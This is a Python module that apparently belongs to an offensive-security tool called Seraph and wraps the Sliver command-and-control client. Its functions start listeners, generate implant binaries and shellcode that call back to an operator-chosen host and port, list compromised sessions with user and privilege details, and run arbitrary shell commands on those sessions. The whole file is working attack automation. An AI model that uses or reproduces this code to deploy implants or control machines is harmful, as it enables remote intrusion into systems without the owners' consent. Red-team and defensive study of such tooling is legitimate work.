"""
Sliver C2 client — wraps the `sliver-client` CLI binary in batch/JSON mode.

Sliver exposes a multiplayer gRPC API, but rather than requiring compiled
protobuf stubs, we shell out to the official `sliver-client` binary using
its `--quiet` + `--json` flags (available since Sliver ≥ 1.5).

Graceful degradation: every public function returns safe empty defaults if
`sliver-client` is not installed or not configured.

Environment:
    SLIVER_CONFIG   Path to the operator config file generated by the Sliver
                    server with `new-operator --lhost ... --save /path/to.cfg`.
                    Defaults to ~/.sliver/configs/seraph.cfg
"""

import json
import os
import shutil
import subprocess
from typing import Any

_BIN = "sliver-client"
_DEFAULT_CFG = os.path.expanduser("~/.sliver/configs/seraph.cfg")
# Configs imported via `sliver-client import` land here in v1.7+
_CLIENT_CONFIGS_DIR = os.path.expanduser("~/.sliver-client/configs")


def _cfg_path() -> str:
    return os.environ.get("SLIVER_CONFIG", _DEFAULT_CFG)


def is_available() -> bool:
    """True if sliver-client is on PATH and an operator config exists."""
    if not shutil.which(_BIN):
        return False
    # Config at the default seraph path
    if os.path.isfile(_cfg_path()):
        return True
    # Or any config imported via `sliver-client import`
    d = _CLIENT_CONFIGS_DIR
    if os.path.isdir(d) and any(f.endswith(".cfg") for f in os.listdir(d)):
        return True
    return False


def _run(args: list[str], timeout: int = 15) -> tuple[int, str, str]:
    """Run sliver-client commands via --rc script file (v1.7+ API)."""
    import tempfile
    # Append 'exit' so the client exits after running the command instead of
    # waiting for interactive input. Pass stdin=DEVNULL for the same reason.
    commands = " ".join(args) + "\nexit\n"
    try:
        with tempfile.NamedTemporaryFile(mode="w", suffix=".rc", delete=False) as f:
            f.write(commands)
            rc_path = f.name
        cmd = [_BIN, "--rc", rc_path]
        proc = subprocess.run(
            cmd,
            capture_output=True,
            text=True,
            timeout=timeout,
            stdin=subprocess.DEVNULL,
        )
        os.unlink(rc_path)
        return proc.returncode, proc.stdout, proc.stderr
    except FileNotFoundError:
        return -1, "", "sliver-client not found"
    except subprocess.TimeoutExpired:
        return -1, "", "sliver-client timed out"
    except Exception as exc:
        return -1, "", str(exc)


def _json_run(args: list[str], timeout: int = 15) -> list[dict] | dict | None:
    """Run command and attempt JSON parse; returns None on failure."""
    rc, stdout, _ = _run(args, timeout=timeout)
    if rc != 0 or not stdout.strip():
        return None
    # Strip ANSI escape codes and find JSON content
    import re
    clean = re.sub(r"\x1b\[[0-9;]*[a-zA-Z]|\x1b\[[0-9]*[JKABCDEF]|\r|\x1b\[[\d;]*m", "", stdout)
    # Try to find a JSON array or object
    for line in clean.splitlines():
        line = line.strip()
        if line.startswith("{") or line.startswith("["):
            try:
                return json.loads(line)
            except json.JSONDecodeError:
                continue
    return None


# ── Public API ────────────────────────────────────────────────────────────────

def status() -> dict[str, Any]:
    """Return connection status for the Sliver server."""
    if not is_available():
        return {"available": False, "connected": False, "version": None}
    rc, stdout, _ = _run(["version"], timeout=15)
    version = None
    if rc == 0 and stdout.strip():
        import re
        clean = re.sub(r"\x1b\[[0-9;]*[a-zA-Z]|\r|\[2K", "", stdout)
        for line in clean.splitlines():
            m = re.search(r"Server\s+(v[\d.]+)", line)
            if m:
                version = m.group(1)
                break
        if not version:
            # fallback: first non-empty non-banner line
            for line in clean.splitlines():
                line = line.strip()
                if line and not line.startswith("*") and not any(c in line for c in ["█", "╗", "╔", "═", "|", "."]):
                    version = line
                    break
    return {
        "available": True,
        "connected": rc == 0,
        "version": version,
        "config": _cfg_path(),
    }


def list_sessions() -> list[dict[str, Any]]:
    """
    Return a list of active Sliver implant sessions.

    Each dict has keys compatible with Seraph's C2Session model:
      msf_session_id, session_type, platform, arch, remote_host,
      remote_port, tunnel_peer, via_exploit, via_payload, status
    """
    if not is_available():
        return []
    data = _json_run(["sessions"], timeout=15)
    if not isinstance(data, list):
        return []
    result = []
    for s in data:
        result.append({
            "msf_session_id": str(s.get("ID", "")),
            "sliver_id": str(s.get("ID", "")),
            "session_type": "sliver_" + s.get("ActiveC2", "unknown").lower(),
            "platform": s.get("OS", ""),
            "arch": s.get("Arch", ""),
            "remote_host": s.get("RemoteAddress", "").split(":")[0],
            "remote_port": s.get("RemoteAddress", "").split(":")[-1] if ":" in s.get("RemoteAddress", "") else "",
            "tunnel_peer": s.get("RemoteAddress", ""),
            "via_exploit": "sliver-implant",
            "via_payload": s.get("Filename", ""),
            "status": "active" if not s.get("IsDead", False) else "lost",
            "hostname": s.get("Hostname", ""),
            "username": s.get("Username", ""),
            "is_privileged": s.get("IsPriv", False),
        })
    return result


def list_listeners() -> list[dict[str, Any]]:
    """Return running Sliver listeners/jobs."""
    if not is_available():
        return []
    data = _json_run(["jobs"], timeout=10)
    if not isinstance(data, list):
        return []
    return [
        {
            "job_id": str(j.get("ID", "")),
            "name": j.get("Name", ""),
            "protocol": j.get("Protocol", ""),
            "port": j.get("Port", 0),
            "started_at": j.get("StartedAt", ""),
        }
        for j in data
    ]


def start_listener(protocol: str, lhost: str, lport: int) -> dict[str, Any]:
    """Start a Sliver listener. protocol: mtls|https|http|dns"""
    valid_protocols = {"mtls", "https", "http", "dns", "wg"}
    if protocol not in valid_protocols:
        return {"error": f"Invalid protocol: {protocol}. Must be one of {valid_protocols}"}
    if not is_available():
        return {"error": "sliver-client not available"}
    args = [protocol, "--lhost", lhost, "--lport", str(lport)]
    rc, stdout, stderr = _run(args, timeout=20)
    if rc != 0:
        return {"error": stderr.strip() or "Failed to start listener"}
    return {"started": True, "protocol": protocol, "lhost": lhost, "lport": lport, "output": stdout.strip()}


def stop_listener(job_id: str) -> dict[str, Any]:
    """Kill a Sliver job by ID."""
    if not is_available():
        return {"error": "sliver-client not available"}
    rc, _, stderr = _run(["jobs", "--kill", job_id], timeout=10)
    if rc != 0:
        return {"error": stderr.strip()}
    return {"killed": job_id}


def generate_implant(
    os_target: str,
    arch: str,
    lhost: str,
    lport: int,
    protocol: str = "mtls",
    format: str = "exe",
    output_path: str = "/tmp/sliver_implant",
    save: bool = True,
) -> dict[str, Any]:
    """
    Generate a Sliver implant binary.

    Args:
        os_target: windows | linux | darwin
        arch:      amd64 | arm64 | 386
        lhost:     C2 callback host
        lport:     C2 callback port
        protocol:  mtls (default) | https | http | dns
        format:    exe (default) | shared | shellcode | service
        output_path: local path to save the generated binary
        save:      whether to write to output_path
    """
    _VALID_OS = {"windows", "linux", "darwin"}
    _VALID_ARCH = {"amd64", "arm64", "386"}
    _VALID_PROTO = {"mtls", "https", "http", "dns", "wg"}
    _VALID_FMT = {"exe", "shared", "shellcode", "service"}

    if os_target not in _VALID_OS:
        return {"error": f"Invalid OS: {os_target}"}
    if arch not in _VALID_ARCH:
        return {"error": f"Invalid arch: {arch}"}
    if protocol not in _VALID_PROTO:
        return {"error": f"Invalid protocol: {protocol}"}
    if format not in _VALID_FMT:
        return {"error": f"Invalid format: {format}"}

    if not is_available():
        return {"error": "sliver-client not available"}

    args = [
        "generate",
        "--os", os_target,
        "--arch", arch,
        "--" + protocol,
        f"{lhost}:{lport}",
        "--format", format,
    ]
    if save:
        args += ["--save", output_path]

    rc, stdout, stderr = _run(args, timeout=120)
    if rc != 0:
        return {"error": stderr.strip() or "Generate failed"}
    return {
        "generated": True,
        "os": os_target,
        "arch": arch,
        "protocol": protocol,
        "format": format,
        "output_path": output_path if save else None,
        "output": stdout.strip(),
    }


def exec_command(session_id: str, command: str, timeout: int = 30) -> dict[str, Any]:
    """Execute a shell command on an active Sliver session."""
    if not is_available():
        return {"error": "sliver-client not available"}
    # Sliver exec: sliver-client execute --timeout N --session <id> -- <cmd> [args...]
    parts = command.strip().split(None, 1)
    exe = parts[0]
    cmd_args = parts[1] if len(parts) > 1 else ""
    args = ["execute", "--timeout", str(timeout), "--session", session_id, exe]
    if cmd_args:
        args += ["--", cmd_args]
    rc, stdout, stderr = _run(args, timeout=timeout + 5)
    if rc != 0:
        return {"error": stderr.strip() or "Exec failed", "output": stdout}
    return {"output": stdout}


def kill_session(session_id: str) -> dict[str, Any]:
    """Kill a Sliver session."""
    if not is_available():
        return {"error": "sliver-client not available"}
    rc, _, stderr = _run(["kill", "--session", session_id], timeout=10)
    if rc != 0:
        return {"error": stderr.strip()}
    return {"killed": session_id}
